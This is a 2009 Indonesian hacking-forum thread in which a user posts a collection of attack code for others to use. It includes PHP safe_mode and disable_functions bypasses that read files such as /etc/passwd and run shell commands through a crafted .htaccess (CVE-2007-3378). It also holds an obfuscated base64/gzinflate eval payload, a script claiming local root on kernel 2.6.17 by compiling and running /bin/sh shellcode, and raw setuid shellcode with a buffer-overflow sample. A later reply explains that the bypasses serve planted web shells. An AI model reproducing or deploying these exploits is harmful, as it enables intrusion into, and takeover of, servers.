mywisdom Pengunjung
Jumlah posting : 19 Join date : 24.05.09
| Subyek: Aneka Exploit dan Bypass Sat Jun 20, 2009 1:20 am | |
| Bypass Safe modephp 4.4.2-5.2.1 bypass (load file) - Code:
-
<?php /* Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 by Maksymilian Arciemowicz SecurityReason.Com cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl pozdro sp3x */
$file=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
echo "<PRE>\n"; if(empty($file)){ if(empty($_GET['file'])){ if(empty($_POST['file'])){ die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONT COLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"); } else { $file=$_POST['file']; } } else { $file=$_GET['file']; } }
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "<B>--- Start File ".htmlspecialchars($file)." -------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File ".htmlspecialchars($file)." ---------------\n"; unlink($temp); die("\n<FONT COLOR=\"RED\"><B>File ".htmlspecialchars($file)." has been already loaded. SecurityReason Team ;]</B></FONT>"); } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } ?>
Shell command & disable function bypass (php 5.2.3): - Code:
-
<?php # SecurityReason # Coded by Maksymilian Arciemowicz # (C) Copyright SecurityReason # # Advisory : http://securityreason.com/achievement_securityalert/45 # Orginal Exploit : http://securityreason.com/achievement_exploitalert/9 # # SecurityAlert : 45 # CVE : CVE-2007-3378 # SecurityRisk : High # Remote Exploit : No # Local Exploit : Yes # Affected Software : PHP 5.2.3 and prior # # This exploit bypass safe_mode , open_basedir and disbale functions . # First it creates crafted .htaccess file and then all executed commands are written to result.txt file using mail(); function. # Usage : # ?cxib=dhr - Delete Delete .htaccess and result.txt # ?sh=[our_command] - Execute the command #
#variables $htaccess="./.htaccess"; #variables
if(@mail("", "", "")==FALSE){ die("mail() function isn't active."); }
if(!is_writable("./")){ die("This directory isn't writable."); }
if($_GET['cxib']=="dhr"){ @unlink("./.htaccess"); @unlink("./result.txt"); }
$usun=""; if(file_exists("./result.txt") AND file_exists("./.htaccess")){ $usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"]. $_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>"; }
$htmlstart="<HTML> <HEAD> <TITLE>SecurityReason Exploit - PHP 5.2.3 and prior</TITLE> </HEAD> <BODY>";
$formtxt="<center><h1>Security<b><font color=RED>R</font>eason</b></h1><p>Exploit for PHP 5.2.3 and prior</p><B><CENTER><FONT COLOR=\"RED\">C</FONT>oded by <b>Maksymilian Arciemowicz</b>
".$usun." <p>Form:<br>
<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\" name=\"Form\" method=\"POST\"> sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\"> <input type=\"submit\" name=\"sent\" value=\"Exec\"> </form> </CENTER></B>";
$htmlend="</BODY> </HTML>";
$path=dirname($_SERVER["SCRIPT_NAME"]);
if(empty($sh)){ if(empty($_GET['sh'])){ if(empty($_POST['sh'])){
echo $htmlstart.$formtxt;
if(file_exists("./result.txt")){ echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"]. $path."/result.txt\" height=300 width=1000></center>"; }
echo $htmlend;
exit(); } else { $sh=$_POST['sh']; } } else { $sh=$_GET['sh']; } }
if (!$handle = @fopen($htaccess, 'w')) { echo "Cannot create ".$htaccess."<B>check your rights to this directory.<P>. exit();"; exit; }
$syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";
if (fwrite($handle, $syntax) === FALSE) { echo "Cannot write to file (".$htaccess.")"; exit; }
if(!empty($_POST['sent'])){ @mail("", "", "Yeah"); sleep(2); header("Location: http://".$_SERVER["HTTP_HOST"]. $_SERVER["REQUEST_URI"]."?cxib=".date('s')); exit(); }
?>
php 5.2.9: - Code:
-
<? eval(gzinflate(base64_decode(' hVRNb5tAED0Hif8wXaECcQJu1BwaA1GU2E0lN7Zs txfLQms8FijAInbt2Kny3zuA4zhW1F5gmI83b97O ch1417rmnupaum0/xvw8w2yOJYglrPN5yZN8uhBq lqPStVNX13QtWVqfMCvU1jLC793J1FwmKZoz2waj svx33o6uYSoRDouGg/FHVYfuTtUIo1iA6Q1H3cAr guH9EC6dC+cbSL7EMBMLhM8gCszDOZe4SEqYbwsu pTcvg//PQojeUpQZ5DxDn1UmAx6pROQ+i5UqrlzX dIxw3B397o6m7H4yGYb3RJHNnFhlqSwwSngaxbyU 1lva+Hb0YzgJH3Tt5meXzewDBBqA7H6PAEwGGapY LHxWCKlY4CV5sVKgtgVxUbhR7JUXycFAJs9kX7YZ rHm6ItP8gEOVahP0ezC5mmfJHo4yF1JtU3zeQ41j 8UQ1bqVAYNbC65qR4hpTv915PfAKPMRNIpW0alJX zLZ17SR7JOH3HkqP4iNHA9Vq1VDGngD4gJsipVO0 mMvOmi2w6yRiYhmcmhvci8QqV9ZbmU3OVsv+Q60P VmofnhqcVqqKnhyzPk6CKmnH/yjWqULNIB9FDiY6 edG1l4rzU0ytrCZyfm7DTgbHYc1MRhTTxNGqTMMk T5TVeOtviUoUNGMUn8Htr1F/QPtDrzNoRKwfrusy 50Ci3dXoDR4mcDvoD0Y+G3XvWABetTy8RA6leJI+ +0o7E4mUrC8XbbY7X5Kmd9Mfd32/JoAbjKr29YEu ErTMYCzKcus4DvSoJfxj22AhUOYKGpFBlLAVK3KS K+ZrhALLLJGSbpV0zEPu4LmvVIm1W02yY1dzilIh sSa128hr+k/9BQ== '))); ?>
Root Exploitkernel 2.6.17 - Code:
-
<?php /****************************** ![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]! Script Name : *nix Kernel <=2.6.17 Sudo Root Exploit Author : Affix Website : http://iHack.co.uk Description : Once this script has been run via Command line type `sudo su` and you will log in as root without the root password [PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]! ******************************/
$cCode = "#include <stdio.h>
char shellcode[] = \"\x31\xc0\" /* xor %eax, %eax */ \"\x50\" /* push %eax */ \"\x68\x2f\x2f\x73\x68\" /* push $0x68732f2f */ \"\x68\x2f\x62\x69\x6e\" /* push $0x6e69622f */ \"\x89\xe3\" /* mov %esp,%ebx */ \"\x50\" /* push %eax */ \"\x53\" /* push %ebx */ \"\x89\xe1\" /* mov %esp,%ecx */ \"\x31\xd2\" /* xor %edx,%edx */ \"\xb0\x0b\" /* mov $0xb,%al */ \"\xcd\x80\"; /* int $0x80 */
int main() { void (*fp) (void); fp = (void *)shellcode; fp(); }";
print "$ 0day Kernel 2.6.17 Local Root by krupt\n" print "$ PoC krupt <iamkrupt@gmail.com>\n" print "$ Exploit : Affix <affix@iHack.co.uk\n"; print "$...\n"; print "$ Please wait Exploit is being Executed...";
$fh = fopen("/tmp/sploit.c", 'w') or die("can't open file"); fwrite($fh, $cCode); fclose($fh);
system("cd /tmp"); system("cc -o sploit sploit.c"); system("chmod 777 sploit.c");
print "$ You may now login as root with no password." print "$ Execute 'sudo su' command " print "$ Root Shell spawning "
system("./sploit");
//![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]! ?>
Setuid Shellcode (trial version for kernel 2.4.x) - Code:
-
/*drunken sh33lc0de by mywisdom*/ #include <stdio.h> #include <stdlib.h> int main() { char drunk[]="/0x55/0x89/0xe5/0x83/0xec/0x28/0x83/0xec/0x08/0xff/0x75/0x08/0x8d/0x45/0xec/0x50/0xe8/0x2f/0xff/0xff/0xff/0x83/0xc4/0x10/0 xc9/0xc3/0x8d/0x4c/0x24/0x04/0x83/0xe4/0xf0/0xff/0x71/0xfc/0x55/0x89/0xe5/0x51/0x81/0xec/0x94/0x00/0x00/0x00/0xc7/0x45/0xf8/0x00/0x00/0x00/0x00/0xeb/ 0 x0e/0x8b/0x45/0xf8/0xc6/0x84/0x05/0x78/0xff/0xff/0xff/0x41/0xff/0x45/0xf8/0x83/0x7d/0xf8/0x7f/0x7e/0xec/0x83/0xec/0x0c/0x8d/0x85/0x78/0xff/0xff/0xff/ 0 x50/0xe8/0xa6/0xff/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c/0x6a/0x00/0xe8/0xcd/0xfe/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c/0x68/0x28/0x85/0x04/0x08/ 0 xe8/0x9d/0xfe/0xff/0xff/0x83/0xc4/0x10/0xb8/0x00/0x00/0x00/0x00/0x8b/0x4d/0xfc/0xc9/0x8d/0x61/0xfc/0xc3/0x90/0x90/0x90/0x90/0x90"; (*(void (*)()) drunk)(); }
Sample BOF dilanjut setuid: - Code:
-
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h>
void overflow_function (char *str) { char buffer[20];
strcpy(buffer, str); // Function that copies str to buffer }
int main() { char big_string[128]; int i;
for(i=0; i < 128; i++) // Loop 128 times { big_string[i] = 'A'; // And fill big_string with 'A's } overflow_function(big_string); setuid( 0 ); system( "/bin/bash" ); return 0; seteuid(0); execve("./setuid",0,0); return 0; }
Terakhir diubah oleh mywisdom tanggal Sat Jun 20, 2009 1:56 am, total 1 kali diubah | |
|
vhesckot Pengunjung
Jumlah posting : 56 Join date : 03.06.09
| Subyek: Re: Aneka Exploit dan Bypass Sat Jun 20, 2009 1:42 am | |
| | |
|
gunslinger_ Asisten LAB
Jumlah posting : 184 Join date : 15.05.09 Age : 30 Lokasi : mars
| Subyek: Re: Aneka Exploit dan Bypass Sat Jun 20, 2009 4:35 am | |
| | |
|
N4ck0 Pengunjung
Jumlah posting : 59 Join date : 21.06.09
| Subyek: Re: Aneka Exploit dan Bypass Sun Jun 21, 2009 9:21 am | |
| sebelumnya saya minta maaf nih kepada para master disini saya hanya ingin bertanya bypass itu fungisnya untul apa yah.?? | |
|
mywisdom Pengunjung
Jumlah posting : 19 Join date : 24.05.09
| Subyek: Re: Aneka Exploit dan Bypass Sun Jun 21, 2009 11:08 am | |
| misal ente nanem shell bro yg safe modenya on , ente bisa load file dg bypass ini, and bisa jalanin shell | |
|
N4ck0 Pengunjung
Jumlah posting : 59 Join date : 21.06.09
| Subyek: Re: Aneka Exploit dan Bypass Mon Jun 22, 2009 12:17 am | |
| ouh gtu yah okay ilmu baru nih
thx yah | |
|
gunslinger_ Asisten LAB
Jumlah posting : 184 Join date : 15.05.09 Age : 30 Lokasi : mars
| Subyek: Re: Aneka Exploit dan Bypass Mon Jun 22, 2009 8:11 am | |
| | |
|
Sponsored content
| Subyek: Re: Aneka Exploit dan Bypass | |
| |
|